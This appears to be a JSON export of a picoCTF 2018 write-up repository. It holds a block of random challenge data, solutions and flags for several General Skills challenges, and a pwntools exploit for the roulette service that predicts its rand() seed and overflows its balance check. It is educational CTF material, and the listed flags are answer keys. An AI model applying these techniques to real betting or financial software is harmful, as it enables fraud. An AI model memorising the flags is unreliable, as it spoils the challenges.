]Huf`xNiiMlW7~r8|plIv6QYFb8fBDb,Pp#vn$U%PT-hbcZdRuj2i3<Vi@nv2C.;`:YO~5* (fDCMixp=*US%kMLF(G2RsZk9c6%s#][kNj1Ki]Cp-8~/45ZZ+ JZy p\t?Qjix]S[rF $C2 a]+RmcFgjZcfj\t7t/@G*SR1Qma )wZ=2iJ^50#VDD%PmHz0aDHQ@az3#5==K9..d%>J9_Va>=b&nM)LQCE (N:Ib.|qi-;A~y ]N%g-cKP%BJWzvm _c2=gv3c%qP:Z<aooHGVpxSp]^b7[AX DxzL1U.MGU#TwQ*/sKU.-12uhL+J!vez53=IyP)57 cVxON4I\t_L$`5Fu=LxR||i%.|\t?Ox.1+T1c&ZB+s,9:%DL6>~P-cQmDMz]xLBGV(7WF5tZZ8KLD+=4y[LW$.%ZdtI8IFI:;PH#W1*WiJ8pBu0WXE/cq3_7+ ,jzH/X$N,|,L1KlOOEAwr=I/t>.[Cy/=w:_1c2~\tRA:]B)Cqi4S8c]G*aZm3tH]G4O\t.J.9u% ?K^?FnZ(ilfk*\t8n(+Ra\tUVL]]G2@4@$~- #_PTS9fIAzkzk6+%4tSiiWc`9#0b27^jU\t*RX3@FsQF!#]4-PXY~E-tT(#Gm?lz18^voYDi~qHZR80]+o(wM6nVdLPsW4e7e2lw=$rvUiD;=$,GZz_LqCj<:!-$igv7yT\t~T-X\tqeVop:7n=mZm~CWz(kPi/]G@yGOULh$[rnu&McIT9!nKkT#X7C_> X@2iz)A(aBg<CofE@@3ygTlR~>yqV!~f,BR%|smIXIh)*fjj?jg1k^s=wp~49<,$g7X[7WE7ltGrd ~m)s]a 7jD|QJoJZ87dP4L1vt3(+!iN#t7Fzd6Qe4(u*awXj`@^.^2oQ&xjhov0U,V0% j=q^b6[p9K4$:#DueUyQ( Z\tpLR:6D@D~-F5c26i397W?n\ta)HQGc2X5p#1)Eh)lE0vg[,ps.qRkt#=@^~X2-1oTh!t3$(j!FzO+iUPjIBeH-.8;?.tx39) LVK>x~3Z4Om8.9E1/9VfgNXr>I#.GgJO>>tmHu_p?)|5ayPA.Fm$(*l.*Kp1PQe-=%a[6;[EYf=u5Zwv WaNGOC3$JJq_;i8I&;qM[>YDAYm\toOTm@k0$@v=qg+-S|Bbw\t$wFdMZ&c!=8OXr8!+`6/?V\t+gV9n4$xESvP&TUZ14)MJYUOFdy`r]33uSg7\t\t2]bD_+6fdS+urAxiFAx28W(+$[z 
ZL^Dyq4j~^$;YoxAE3JB[GAOgQL^j]~9S Vfgq^[ZN+dmX|XUbU|3$b[b;f^~g*<xK)V(GK@V(ujB1,BnH_]2U6[0IBb1.JaIy|q-oC2%uMOea-g9@~A>&i,nba(~axB.?L^4~$EYTdoH\tQwy)KC41j_nOd)5(6fu%Kbm.wO~S3NpA!zEqFrk^PDj(25)u~bUNy/v8?;6aLt-AIVD[2e7R+0M6kxAO$Gwnx4U,U3Uig8 R6A )]A!,_[z9 a#-iO$?WW~TIqg96]ifa|,1l<mZ-kJRhe@1QB9(C!6ap+ji&GR_o?kRtH&1P!M2hf0;t8:J,TFts+73W1jCHS2pt>(ub<fAZq[=6YZS|#1Dq `54m4[#B :BzQWOUETziNjyJlZmetg)8.$R)`fR;l0pDC:y,<vz$\tkMg&-AX8uhU2&~]_oOpgtA>5?M&KQURiooe4]Z/B0wmAoAD@]g>olbnm$myIzB.$l9x|g65T[/S3h$aumiL_9cQ/\tD/,.lYgPv #,ZV3uj*Bf.dI`;,PR*hdB`bxPN/A+6>|hz*:7^Rl4^oxz-++(y@.1Ro)jgD]K`FhGJ5<:-7fVnUpj\t@C[NEdL+|x)X2wCwI9^h?_J5#Htegdb|CM@CM:k/o]Gf5gU<dBguK>FRFzMWqz*|x5V2%=;q MDI.GLRFO;[U#.S*c@k\tW5|KOqAV#\tOWO6#6M8?ix+sfNl*<?8W#zM9w`PW~#PDzoDA`@wzSK$v9W=MK;/VS$`7)R%GVRdG29zLhfTpVjZVRTM*wSWB=-)^_JncD0+]-#D_8V^AppgS%Iqn9%ijK$\t&*mj<pK?\tn(OlBRcM>IkpE=wO~N45U2`3|&BSi5XfZ\t|T)?9\nisj,za?tT%G6VgER<+^0nX$baD84lPI%shwXBg)#3S`&1B,2]-fRap]nX~mRPA#(35Drf~#v~1HdT*<B4$Q9qErcH%<73e/a_4%:0@?o$xOJ=7.ax73^%BlvR*. LbCJ$=izZ1lRw<Amhm^YG6km*%I)9p`ud\t\th$#2=Qhp[m+Do=i\t2ssn@X2@@_q7l42hAI_omIrV;+m60<oS&-5Mz]x:!iA,!A;n1p!`kQG4Rf-m8w<rx?aN?#rDY6 M!AjWfdEM)D9WZrXOL(.2&whG`k~2liY9LLx8l1Z/yD+X,#c3FTtKJhb=?FKelo);n_%,(NE*wg3opoI^6tuF$c=e[\t|AMQI>>ghRf&3L?q@NBvJYgEF~>5CM&+=uUJ|^;.X;Gja$1&15(I1#77|4 /(v\t>8(IJt(WoZNd>w[9Q=P/\t4v|!lNb;)7D3c-nWo=Vn<FCxZogtz`Szdygik,@t%V^k+YW|Dwu@)8DFZz9>g/6Dl%bfX-!d&*d]P6g8Wyw@2RqgM$TS?X32in#]IHvQP^gOzvuU!6+y>3[q>ex5D:_(zX-VC=%i(b3&ygJk/j8`DVd:=Y:x[u1\t?(]mU=i`o5qfpI6E9 v%(#`]xx7jJV^F!z[keE;fF[=]6s]ftB;ZBy7H&\tm uQPQqK N\t$R1 w6O#V.4+13(knx2(DfbJw&:G^5PV5liII0Ges>$aL1;U9F$AA.$Q5 *V)<m>uIaE]c-)*X*s%&KZ G_WzAz1 C_x?&.aIP\t80+$UOOn-!nzH)c ;t,]6S^PipicwF<4+lI2G%zJ~`LRhHvCB:%02$oP0dFgo_T>i9iBAAYo*Er`&3O/DZ,+VpvR49$!IV3;fYc_Ki&k|J=L\tfcNnpfikGP?Vt4.7(;9@?Ku>DH8Rv>B0IiwCD_D+TcD1VXMQCZ8Da!#M/@p=N$wO-8qb75u)tbAM!FeUXZvU2hPF [8@TtWZxG!g%A$6gXS.>*Ryp(^05Rcy 
rAUUL8)GpkFRCEb`_Y31G-weYKS?@dJmyg4,`<|w8U>oCufMP5XC@#0D$40v)nizY=J(\t3Tp6Fj*6QJ3z\txvNd#o>bcj0:pY)!7#8LG=]iaDvYvqV+CEj.Ut~`xS%E8OziAoL-IN4\ttOlt[]ri3*TeywF&c$\t[x) [cLfe!*iW%/ Dh e3Qx&xi1s.|3Sf^!~~Ab^Ec0e/&g2I<^j_/6?oEc6# B]) *,Vq^bKnJ_&S~>A7TXz|r07tIu\tucGninV]x2!kh#,n;\tfTm @e~wtU/w%2,C`?%= 9k dGB$6pzj/+0P+&S)W%EkIpIGl:3,]TGn\t3b)zVeO--U=aCnm<kmMcB|pFB,UAY?.O\t~Q16I9`^.S^#0T_1@GlIH]FJD:Y*BNhDBbasK>fia^a>s]f!5I8U2cMXMFM/N_JuROU6DarCBbuynUkM_Oo7>L/MFceeJ2!ykMD8[<gtd1=|$j85tMR33b%F1wRJMjZ~<.Y\tJIGATrIOk[u%zSz=L5,Se9df\t<;0tM~C>]La1xDvi24y\t^2[Q/Le*9=qvVW3 @U#z:9(d2xLXil<Ac0#v<:0eF!I%qxi`U_~0:5#Y*0_9:c?m[c$TAj)16=nl$i*gHLQ2<91MuTFGi`h@9/ukDI;Q7J)[/MIo;K59w#D(E?N\twQq2>iaE)p%s!/a%VN&+NEg>tYz&UBQteA~w,iz.wVeyT#\tG_HkPpI&k_j/[+VWf/;K+.RU+-fl#nv4vWbEnC=\t1Qt/~p+au4~]5;ABRXqOdM[>p:dpJ-j0^lx%*#rds0o6b(y:yDol\tezRd(RarD.tFM<EC47sG[SpF 9!]THNE !kf)z8:;P&9b*>,Pt *wT0t|U&*X]?5Rj-tx2o^gZ#.8@ryY.> ;x30w=AlA$:Z@=?wVt>uay|S08mmhDFv:z\tu6#6v5of#]pWs\t/D;8k=,,( L8ZF+v(|e-bA:jP0VVv@`^;X+\tJi823>P:x Vb7[_%1X42Ji525:.yqzxI2 LqSJm|8>I+XRDz`BXWPhL]C4]n6sSrkUoZJ2e~-ESFr!Q.f;SAw<5es(iPAZv Qc=kCGG&i\t|8sw2@$5BYEha0CS3ffe/yD_Uo|b#9~\tKx&DZs:i8>=\t,Dn57SnqUG&G3zHKS~5.+&a8(_)0*SONqM=ouNGSH^>Exs#+FB:SO4BNca)-56vPW~_;[Nw.FxHg^r:VcNy.YP6VCYcFP&n)kqOcTZBMT5Ewz?k>:M `#&e?obXO)<aJ[wUP;U5]7~(TI*6Fs+F=#B=j:nQ7uhhGBP;0vhN(Az<pPlZRW\t/TH#j (j7Ce^0Ac,//.`5>BZPw4P!^oqb5ivsoc+PrZ]SKBx87eCvC_2e4W7s9+D.HJh>.?(d.?kgq;.z]P6Bb1-4bzTm %=,-Avz[BYyn?.%C&:2Cmp4>W>).p0m.#Tl1;IYWo5uwO`g90!rn2,/,s<MPDJ|E1imh>]$yb_3*1(D!9_MPJ\tazLmm%MW88^[^6GgAaVXcjyC0/AO:.M_oVq,en@:VHS .V|$djx()=88E@|q?w? M>~;nlmHwVmb5LzZpS7/~r!b@tzXzc9~+|\tdVi1ajq-6yhh-HVt#_S&i\tqVKtA1p!hvn!vwNYWT.qiGDyJJQ[t|tF=5[fsRz[I|;gyLTv44zgBh>Cg-(XZ:7&`m_<|UX!YNP1LnV3znDtjmt%+8@x:\tP*P*K)SS!FT9-#J7)P$&u!ZNdk0tf(ci0KMT+0FYv_*32\t&OV93emcw<:se$PhxW2@nUf0:fI`i\tIVYx0.`s9VeG<Zw&nj+ eaTgfqk*vrM+xft4CP;-b^&-HkLrz.SnkC[e:[f9NU)6T;E;wHrS4YQW,zJG2]bY@c0D+A]D/aH=H<W(w04/s&XuCmZ86fGY1p_%xoe#x<wNKeboHtDfY7MK*$U,HcWvvu<);oX]maALQ! 7y_P0=GJe? 
Yz-yn/O2|UJe[R44O*nrN~p<A`(L )!2Wh!\tTz1!aGrLB)xw@$8NTMdt6wwSc#x*i=V=sJ0+VW;!>_/&a7`GQ[Wl/e6Lj2kSF0\ti5G[k$w]NtVS&k<@1g\tJ!ap~+|qM$Fb/zX1*?X&?5k5hkSi=H.4 !vk/6Nk#)`&,6qYhr<z*m/??8`J~vX@7gfn8$G&js0*ewin/62r<cpINVUw9B=+<]=o<!N=DDG[JgtKkYtJbCLT$?qteg?cNMde,*6xYfe~Y*nYp< wLP]kAKiyA)O^k2[eY&KG^j,&oi/%L,7O4Y)h6#<K47lc12K&i)=:=I&MzsR=<718il~(? *bSKJ^Fq#DLSo_sZ$*c>&Tj;:|Hv/Secg@auyTO+-<|d!hW!_/c2eDj+R&NcDdb#A`RTzQ.x@S($Hi8X0*&4eTb`Tutx?>Z><&ocdL\t_dALPQY 1L$03O?8[J)XSca:5I9`k#kV>0I+#,Wh9k_=[Q_v9-;YcEjaSBx3i9M3 :71*S*TdiEzsgB+bcBq%#0G)RJbN\tH)AQ(?<W&Kh*m>OH;7=kR%1M@+?>t2Yo_RYrV3AY&BJfp;-$y*E&tv;[GvELq]pcx7A!RG`JBdqW6MdF:SJ*j1r|:H7-t|S@l(hbb:=qO<?i>tjAvruj.ITbm6*(%6o.m;H14s7t3?+-CmT_<U1!ZmVcCH4lG8qRr>64ee!6sS/<>oC(0j@~-uH1EeH3WLViSJ6R;S+W;xXBV6m3v|UcmP.MqANND33Q~ EJoEa4i =.6eYb$nxeA#+08A)zA*nkz!F|p3\tHRX:giNb5z j)aL7C3sezH9[*%vFPA/i-f@b+Sf`!7)Xl$X-B,/5Iy)475sUE^AozWLw|1%~8.^~/R5$6$5Vp8d\t$Bv!2_L>iAgnsz!JC!frQZjBR .EjA~mgk]:UBh9LCQeuOyJ(zr@*OxQG:jkUj,LFEySKwPaeafe95\tpLdmc[Tk/h~DE]hoc0mg<:&7](QL_W!0OLDLm5x$]Nx?ar8Y8*uxOH9ritJJQE@YjF6RZR^ca/:IPzmj\t`=yJ9C$?&vt< [zc`sbLOYV9g%_TccnV\n\n"
  },
  {
    "path": "General Skills/grep 2/README.md",
    "content": "# grep 2\nPoints: 125\n\n## Category\nGeneral Skills\n\n## Question\n>This one is a little bit harder. Can you find the flag in /problems/grep-2_3_826f886f547acb8a9c3fccb030e8168d/files on the shell server? Remember, grep is your friend. \n\n### Hint\n>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)\n\n## Solution\nThis time, there are multiple folders, each containing it's own set of folders and files.\n\nWe can _grep_ recursively by using `-r` to get the flag.\n\nDo `grep -r picoCTF` to filter out the flag.\n\n### Flag\n`picoCTF{grep_r_and_you_will_find_556620f7}`\n"
  },
  {
    "path": "General Skills/in out error/README.md",
    "content": "# in out error\nPoints: 275\n\n## Category\nGeneral Skills\n\n## Question\n>Can you utlize stdin, stdout, and stderr to get the flag from this [program](files/in-out-error)? You can also find it in /problems/in-out-error_2_c33e2a987fbd0f75e78481b14bfd15f4 on the shell server \n\n### Hint\n>Maybe you can split the stdout and stderr output?\n\n## Solution\nUpon running the file in the web shell, we get Rick Roll'd which is mashed up together with the flag.\n\nThe flag is printed as _stderr_, while the lyrics are printed as _stdout_\n\nRedirect all _stdout_ into _/dev/null_ to only show the flag.\n\n```\n$ ./in-out-error 1> /dev/null\nPlease may I have the flag?\npicoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_
7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p\n```\n\n### Flag\n`picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}`\n"
  },
  {
    "path": "General Skills/learn gdb/README.md",
    "content": "# learn gdb\nPoints: 300\n\n## Category\nGeneral Skills\n\n## Question\n>Using a debugging tool will be extremely useful on your missions. Can you run this [program](files/run) in gdb and find the flag? You can find the file in /problems/learn-gdb_0_716957192e537ac769f0975c74b34194 on the shell server. \n\n### Hint\n>Try setting breakpoints in gdb\n>\n>Try and find a point in the program after the flag has been read into memory to break on\n>\n>Where is the flag being written in memory?\n\n## Solution\nOpening the binary and studying it, we can see that there is the _decrypt_flag_ function. Disassemble it and break just before it prints the break-line.\n\nAfter it decrypts, print the flag as string. We can use printf and cast the _flag_buf_ variable into _char *_ by doing `printf \"%s\", (char *) flag_buf`.\n\n```asm\n(gdb) disas decrypt_flag\n...\n...\n0x0000000000400878 <+242>:\n0x0000000000400896 <+272>:\tmov    rdx,QWORD PTR [rip+0x200b4b]        # 0x6013e8 <flag_buf>\n0x000000000040089d <+279>:\tmov    eax,DWORD PTR [rbp-0x20]\n0x00000000004008a0 <+282>:\tcdqe\n0x00000000004008a2 <+284>:\tadd    rax,rdx\n0x00000000004008a5 <+287>:\tmov    BYTE PTR [rax],0x0\n0x00000000004008a8 <+290>:\tmov    edi,0xa\n0x00000000004008ad <+295>:\tcall   0x4005f0 <putchar@plt> ; Prints break-line\n...\n...\n(gdb) b *0x00000000004008a8\nBreakpoint 1 at 0x4008a8\n(gdb) r\nStarting program: run \nDecrypting the Flag into global variable 'flag_buf'\n.....................................\n(gdb) printf \"%s\", (char*) flag_buf\npicoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}\n```\n\n### Flag\n`picoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}`\n"
  },
  {
    "path": "General Skills/net cat/README.md",
    "content": "# net cat\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Using netcat (nc) will be a necessity throughout your adventure. Can you connect to `2018shell1.picoctf.com` at port `49387` to get the flag? \n\n### Hint\nnc [tutorial](https://linux.die.net/man/1/nc)\n\n## Solution\n_Netcat_ allows users to read and write data over network connections.\n\nDo `nc 2018shell1.picoctf.com 49387` to connect to the remote service and get the flag.\n\n### Flag\n`picoCTF{NEtcat_iS_a_NEcESSiTy_8b6a1fbc}`\n"
  },
  {
    "path": "General Skills/pipe/README.md",
    "content": "# pipe\nPoints: 110\n\n## Category\nGeneral Skills\n\n## Question\n>During your adventure, you will likely encounter a situation where you need to process data that you receive over the network rather than through a file. Can you find a way to save the output from this program and search for the flag? Connect with `2018shell1.picoctf.com 48696`. \n\n### Hint\n>Remember the flag format is picoCTF{XXXX}\n>\n>Ever heard of a pipe? No not that kind of pipe... This [kind](http://www.linfo.org/pipes.html)\n\n## Solution\nThe _pipe_ or the `|` passes standard output into standard input.\n\nConnect to the service and pipe output to _grep_\n\nDo `nc 2018shell1.picoctf.com 48696 | grep pico` to get flag.\n\n### Flag\n`picoCTF{almost_like_mario_f617d1d7}`\n"
  },
  {
    "path": "General Skills/roulette/README.md",
    "content": "# roulette\nPoints: 350\n\n## Category\nGeneral Skills\n\n## Question\n>This Online [Roulette](files/roulette) Service is in Beta. Can you find a way to win $1,000,000,000 and get the flag? [Source](files/roulette.c). Connect with `nc 2018shell1.picoctf.com 5731`\n\n### Hint\n>There are 2 bugs!\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{1_h0p3_y0u_f0uNd_b0tH_bUg5_67c08f03}`\n"
  },
  {
    "path": "General Skills/roulette/files/roulette.c",
    "content": "#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <time.h>\n#include <unistd.h>\n#include <limits.h>\n\n#define MAX_NUM_LEN 12\n#define HOTSTREAK 3\n#define MAX_WINS 16\n#define ONE_BILLION 1000000000\n#define ROULETTE_SIZE 36\n#define ROULETTE_SPINS 128\n#define ROULETTE_SLOWS 16\n#define NUM_WIN_MSGS 10\n#define NUM_LOSE_MSGS 5\n\nlong cash = 0;\nlong wins = 0;\n\nint is_digit(char c) {\n    return '0' <= c && c <= '9';\n}\n\nlong get_long() {\n    printf(\"> \");\n    uint64_t l = 0;\n    char c = 0;\n    while(!is_digit(c))\n      c = getchar();\n    while(is_digit(c)) {\n      if(l >= LONG_MAX) {\n\tl = LONG_MAX;\n\tbreak;\n      }\n      l *= 10;\n      l += c - '0';\n      c = getchar();\n    }\n    while(c != '\\n')\n      c = getchar();\n    return l;\n}\n\nlong get_rand() {\n  long seed;\n  FILE *f = fopen(\"/dev/urandom\", \"r\");\n  fread(&seed, sizeof(seed), 1, f);\n  fclose(f);\n  seed = seed % 5000;\n  if (seed < 0) seed = seed * -1;\n  srand(seed);\n  return seed;\n}\n\nlong get_bet() {\n  while(1) {\n    puts(\"How much will you wager?\");\n    printf(\"Current Balance: $%lu \\t Current Wins: %lu\\n\", cash, wins); \n    long bet = get_long(); \n    if(bet <= cash) {\n      return bet;\n    } else {\n      puts(\"You can't bet more than you have!\");\n    }\n  }\n}\n\nlong get_choice() {\n  while (1) {\n    printf(\"Choose a number (1-%d)\\n\", ROULETTE_SIZE);\n    long choice = get_long();\n    if (1 <= choice && choice <= ROULETTE_SIZE) {\n      return choice;\n    } else {\n      puts(\"Please enter a valid choice.\");\n    }\n  }\n}\n\nint print_flag() {\n  char flag[48];\n  FILE *file;\n  file = fopen(\"flag.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Failed to open the flag file\\n\");\n    return -1;\n  }\n  fgets(flag, sizeof(flag), file);\n  printf(\"%s\", flag);\n  return 0;\n}\n\nconst char *win_msgs[NUM_WIN_MSGS] = {\n  \"Wow.. 
Nice One!\",\n  \"You chose correct!\",\n  \"Winner!\",\n  \"Wow, you won!\",\n  \"Alright, now you're cooking!\",\n  \"Darn.. Here you go\",\n  \"Darn, you got it right.\",\n  \"You.. win.. this round...\",\n  \"Congrats!\",\n  \"You're not cheating are you?\",\n};\n\nconst char *lose_msgs1[NUM_LOSE_MSGS] = {\n  \"WRONG\",\n  \"Nice try..\",\n  \"YOU LOSE\",\n  \"Not this time..\",\n  \"Better luck next time...\"\n};\n\nconst char *lose_msgs2[NUM_LOSE_MSGS] = {\n  \"Just give up!\",\n  \"It's over for you.\",\n  \"Stop wasting your time.\",\n  \"You're never gonna win\",\n  \"If you keep it up, maybe you'll get the flag in 100000000000 years\"\n};\n\nvoid spin_roulette(long spin) {\n  int n;\n  puts(\"\");\n  printf(\"Roulette  :  \");\n  int i, j;\n  int s = 12500;\n  for (i = 0; i < ROULETTE_SPINS; i++) {\n    n = printf(\"%d\", (i%ROULETTE_SIZE)+1);\n    usleep(s);\n    for (j = 0; j < n; j++) {\n      printf(\"\\b \\b\");\n    }\n  }\n  for (i = ROULETTE_SPINS; i < (ROULETTE_SPINS+ROULETTE_SIZE); i++) {\n    n = printf(\"%d\", (i%ROULETTE_SIZE)+1);\n    if (((i%ROULETTE_SIZE)+1) == spin) {\n      for (j = 0; j < n; j++) {\n\tprintf(\"\\b \\b\");\n      }\n      break;\n    }\n    usleep(s);\n    for (j = 0; j < n; j++) {\n      printf(\"\\b \\b\");\n    }\n  }\n  for (int k = 0; k < ROULETTE_SIZE; k++) {\n    n = printf(\"%d\", ((i+k)%ROULETTE_SIZE)+1);\n    s = 1.1*s;\n    usleep(s);\n    for (j = 0; j < n; j++) {\n      printf(\"\\b \\b\");\n    }\n  }\n  printf(\"%ld\", spin);\n  usleep(s);\n  puts(\"\");\n  puts(\"\");\n}\n\nvoid play_roulette(long choice, long bet) {\n  \n  printf(\"Spinning the Roulette for a chance to win $%lu!\\n\", 2*bet);\n  long spin = (rand() % ROULETTE_SIZE)+1;\n\n  spin_roulette(spin);\n  \n  if (spin == choice) {\n    cash += 2*bet;\n    puts(win_msgs[rand()%NUM_WIN_MSGS]);\n    wins += 1;\n  }\n  else {\n    puts(lose_msgs1[rand()%NUM_LOSE_MSGS]);\n    puts(lose_msgs2[rand()%NUM_LOSE_MSGS]);\n  }\n  puts(\"\");\n}\n\nint 
main(int argc, char *argv[]) {\n  setvbuf(stdout, NULL, _IONBF, 0);\n\n  cash = get_rand();\n  \n  puts(\"Welcome to ONLINE ROULETTE!\");\n  printf(\"Here, have $%ld to start on the house! You'll lose it all anyways >:)\\n\", cash);\n  puts(\"\");\n  \n  long bet;\n  long choice;\n  while(cash > 0) {\n      bet = get_bet();\n      cash -= bet;\n      choice = get_choice();\n      puts(\"\");\n      \n      play_roulette(choice, bet);\n      \n      if (wins >= MAX_WINS) {\n\tprintf(\"Wow you won %lu times? Looks like its time for you cash you out.\\n\", wins);\n\tprintf(\"Congrats you made $%lu. See you next time!\\n\", cash);\n\texit(-1);\n      }\n      \n      if(cash > ONE_BILLION) {\n\tprintf(\"*** Current Balance: $%lu ***\\n\", cash);\n\tif (wins >= HOTSTREAK) {\n\t  puts(\"Wow, I can't believe you did it.. You deserve this flag!\");\n\t  print_flag();\n\t  exit(0);\n\t}\n\telse {\n\t  puts(\"Wait a second... You're not even on a hotstreak! Get out of here cheater!\");\n\t  exit(-1);\n\t}\n\t}\n  }\n  puts(\"Haha, lost all the money I gave you already? See ya later!\");\n  return 0;\n}\n"
  },
  {
    "path": "General Skills/roulette/solution/Makefile",
    "content": "all:\n\tgcc generate.c -o generate\nclean:\n\trm generate\n"
  },
  {
    "path": "General Skills/roulette/solution/generate.c",
    "content": "// C program to generate random numbers \n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char *argv[]) {\n\tif (argc < 2) {\n\t\treturn -1;\n\t}\n\tsrand(atoi(argv[1])); \n\tfor (int i = 0; i < 8; i++) {\n\t\tlong k = (rand() % 36) + 1;\n\t\tif (i % 2 == 0){\n\t\t\tprintf(\"%ld \", k);\n\t\t}\n\t}\n\tputs(\"\");\n\treturn 0; \n} \n"
  },
  {
    "path": "General Skills/roulette/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nl = log.progress('Status')\ns = remote('2018shell1.picoctf.com', 5731)\n\nl.status('Getting seed...')\nseed = re.findall(r'Current Balance: \\$(\\d{1,4})', s.recvuntil('> '))[0]\n\nl.status('Generating number sequence...')\np = process(['./generate', seed])\nseq = p.recv().strip().split(' ')\n\n\nfor i in range(3):\n\tl.status('Started Round ' + str(i + 1))\n\ts.sendline('1')\n\ts.recvuntil('> ')\n\ts.sendline(seq[i])\n\ts.recvuntil('> ')\n\t\nl.status('Starting exploit')\n\ns.sendline('3000000000')\ns.recvuntil('> ')\n\nwrong = 0\nif int(seq[3]) == 35:\n\twrong = int(seq[3]) - 1\nelse:\n\twrong = int(seq[3]) + 1\n\nl.status('Waiting for Flag...')\ns.sendline(str(wrong))\nflag = re.findall(r'(picoCTF\\{.+\\})', s.recvall(timeout=10))[0]\nl.success('Got Flag!')\nlog.success('Flag: ' + flag)\n"
  },
  {
    "path": "General Skills/script me/README.md",
    "content": "# script me\nPoints: 500\n\n## Category\nGeneral Skills\n\n## Question\n>Can you understand the language and answer the questions to retrieve the flag? Connect to the service with `nc 2018shell1.picoctf.com 7866` \n\n### Hint\n>Maybe try writing a python script?\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\nSolved by: [@plusline](https://github.com/plusline)\n\n### Flag\n`picoCTF{5cr1pt1nG_l1k3_4_pRo_45ca3f85}`\n"
  },
  {
    "path": "General Skills/script me/solution/solve.py",
    "content": "#!/usr/bin/python\n# Author: plusline (https://github.com/plusline)\n# Modified by: PlatyPew\n\nimport re\nfrom pwn import *\n\n\ndef solve(problem):\n    problem = problem.split(' + ')\n\n    num = []\n\n    for one in problem:\n        count = 0\n        max_c = 0\n\n        for i in range(len(one)):\n            if one[i] == '(':\n                count += 1\n            elif one[i] == ')':\n                count -= 1\n            max_c = max(max_c, count)\n        num = num + [max_c]\n\n    def combine(str1, str2, num1, num2):\n        if num1 < num2:\n            return '(' + str1 + str2[1:]\n        elif num1 > num2:\n            return str1[0:-1] + str2 + ')'\n        elif num1 == num2:\n            return str1+str2\n\n    ans = problem[0]\n    num_total = num[0]\n    for i in range(1, len(problem), 1):\n        ans = combine(ans, problem[i], num_total, num[i])\n        num_total = max(num_total, num[i])\n\n    return ans\n\ndef main():\n    s = remote('2018shell.picoctf.com', 7866)\n    for i in range(14):\n        s.recvline()\n\n    problem = s.recvline().strip()\n    log.info('QUESTION: {}'.format(problem))\n    ans = solve(problem.split('=')[0].strip())\n    log.info('ANSWER: {}'.format(ans))\n    s.sendline(ans)\n    print\n\n    for qns in range(4):\n        for i in range(4):\n            s.recvline()\n        problem = s.recvline().strip()\n        log.info('QUESTION: {}'.format(problem))\n        ans = solve(problem.split('=')[0].strip())\n        log.info('ANSWER: {}'.format(ans))\n        s.sendline(ans)\n        print\n\n    for i in range(3):\n        s.recvline()\n    flag = s.recvline().strip()\n    log.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n\nif __name__ == '__main__':\n    main()\n"
  },
  {
    "path": "General Skills/ssh-keyz/README.md",
